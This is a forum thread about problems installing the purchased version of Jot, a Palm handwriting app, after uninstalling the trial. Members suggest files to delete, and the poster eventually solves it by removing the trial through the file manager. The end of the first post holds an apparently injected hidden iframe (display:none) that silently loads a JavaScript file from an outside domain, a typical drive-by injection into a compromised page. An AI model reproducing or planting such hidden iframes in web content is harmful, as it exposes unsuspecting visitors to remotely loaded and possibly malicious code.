+ Reply to Thread

Jot Install problems

Jot Install problems
    I installed a trial version of Jot and decided to get purchase it. The instruction are very specific as to uninstalling the trial version before installing the full version. You also must remove Jot prc. from your desktop backup folder. I followed the directions to a T.

I installed the new version (soft reset after uninstall of the trial, then another after the new install) and it's telling me that I have another version of Jot on my device and I must uninstall that before I put in the new one. THERE IS NO PREVIOUS version anywhere on my palm. But the software seems to think there is.

I'm getting zero response from the developers. I would be so appreciative if someone here can help me out with this...

:angel2 :angel2

Thanks,
    Tracey<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Tracey-

I have been using Jot and WordComp for several weeks w/o any problems. When I bought it, they were bundling these two together. I don't know if this will help, but you might try looking for "Word Comp" in your list of files to delete. Also, the files "CICEnglish" and "CICUserDict" are a part of my bundled package called Jot Complete.

Hope this helps.
    Krazman - "IT MAY BE THAT YOUR PURPOSE IN LIFE IS TO SERVE AS A WARNING TO OTHERS"

I have CIC databases then sslplus. Is that it? I don't want to delete something I need by mistake.

Is it possible that my backupbuddy has some Jot (trial version) prefs stored in? That could be what the software is recognizing?

??

I don't know anything about the "sslplus" thing. I DO KNOW that the "CICEnglish" and "CICUserDict" are a part of Jot Complete. I checked it out on the unzipped original that I downloaded into my computer. It's going to take someone smarter than me to tell you about "sslplus". I would try deleting those 2 CIC files and go from there.

I just used filemanager and found what you are talking about. I'm still not sure about sslplus. Go to the main apps screen and hit delete from the pulldown menu. You will see that the two files I am talking about are seperate from sslplus. They are also seperate if you hit the trashcan on the main LauncherX screen (if you have it installed).

Sorry I can't be of more help. GOOD LUCK!
    Krazman - "IT MAY BE THAT YOUR PURPOSE IN LIFE IS TO SERVE AS A WARNING TO OTHERS"

Got it!

I seemed to have licked it. I'll post my mistake in case anyone else has the problem in the future. I deleted the trial version of Jot from file manager rather than the launcher. That was it!

Thanks for all the help...

T

Way to Go!!!!! Glad you got it fixed.